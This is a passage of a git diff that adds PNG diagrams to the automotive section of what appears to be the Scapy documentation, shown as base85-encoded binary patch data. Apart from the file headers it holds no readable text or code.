zd?pb?#K4FMJVQ3_tb-A@+Wa0VO&yw2>P!nGQj47}*(?!ukdu&-EPD5ELNWo{6M)N= z`&qGxkbpTafK=pHJWIry|9Ti@WW-#cjE01a5l@Q}|5G_C2B(PGe1#t!02=fv5wI-a zuLiw?T@?`3{`*lj24B8>L3U+O;*FFDmgq>Ax0rcx1tR>L(a~qKvimmhpjZOIuq)?8 z-%WQoq0zQl$il+H6FCSSrRBv!ia5S5V6Zb#1=IRJG)?LFs-(^*;y-StVlU0Cnwl$7FeT!*W=?C zp}#n{?5)l8T5Vh%vi0d#DG%B1tD7B=j<(5tUi)7x}p@$LKjShcRpzC zi6cCP!MXJxVHxx`1=2+iD{0v9gQlKdVXF75}a#eNmK>Vnu4gfa|p3aw*1D@geKqW#G zIK|H|?KY_1;J6BUv4$=IgET(=i^~fPMZ`VWgIu+ouVALt;$B!t04WA(T+16f<{2h? z^YZiA+&!@kDv684CR2+y@qRr2@qWbWh#w1l+_TreFi#SI!>cI}oeTZG!NbP@`M%7@)(EbrFs-RRJGhuDEYTyw@@2}5i$ ze^d9i57Y1qwEU}3oyo79(2>tU53tl%gKoTQY}^32u6ykOrG&w!UgxvIe|Jv`{$uxq zePu^37R@F!7GZHNh8;TL3K!v@pT8HONPN9FjuzEXiaS8RzZm9?z!h_!g;y=v2=N}G z8E*WEAJ7bAZk zP>F)=k`fZcRuoL}*3Rtd+1UhSjFED1llW{_V?8yIvlz`2BYYr$$k;ToxP$RBpQxy2 z!y>VopqEICtm5v7Yp^=LR6}Go=nI3!JC}w&Uxk?_R!-33zF07V(-yN!!wku~iV;m{ zjXaY0o(JIuu;GePbfR{Q9EZ5oDy#(W36sQ58G`@Qn~7>5(oV=)rFh-0_hKctpIy5R zBL%}{IZdSyUro3pW{#Pr`{}Qly0=HaVbWOSKA{ASi|@ePfG4no3h!&pgo!`hSzJ`> zydk3Szu>OO=MxcsEU$SA3H>P0f!25Ynn#4{HNW{W&y?b+cq~DDjlssov(D(kpIDKY z<~{nF?;*Dj+P}>s$4gN;0wXNl+{2QE!>Un>4Y-SoPNj6_w>^ zWcl||fq{W(e2$39UP>|^>^#Rp>OzOLIK1A5-a}yub00O_J4aO*p9z)g#>gXmJoN)?m&;* ziYswSpXCU-`X0_GqzDMfHpkI(?D|}1l!=zJ5AC~b)~Tt9M+bd(u~Poe6aRc|Ey|3@pYikm e`i-_FI^KXv)kN!vo%sG9N#l^VN`{ifwf_apPlen7 literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/automotive/diag-stack.png b/doc/scapy/graphics/automotive/diag-stack.png new file mode 100644 index 0000000000000000000000000000000000000000..76a7b11635e1c7f8d612c5558c6c66d2a7507470 GIT binary patch literal 44140 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 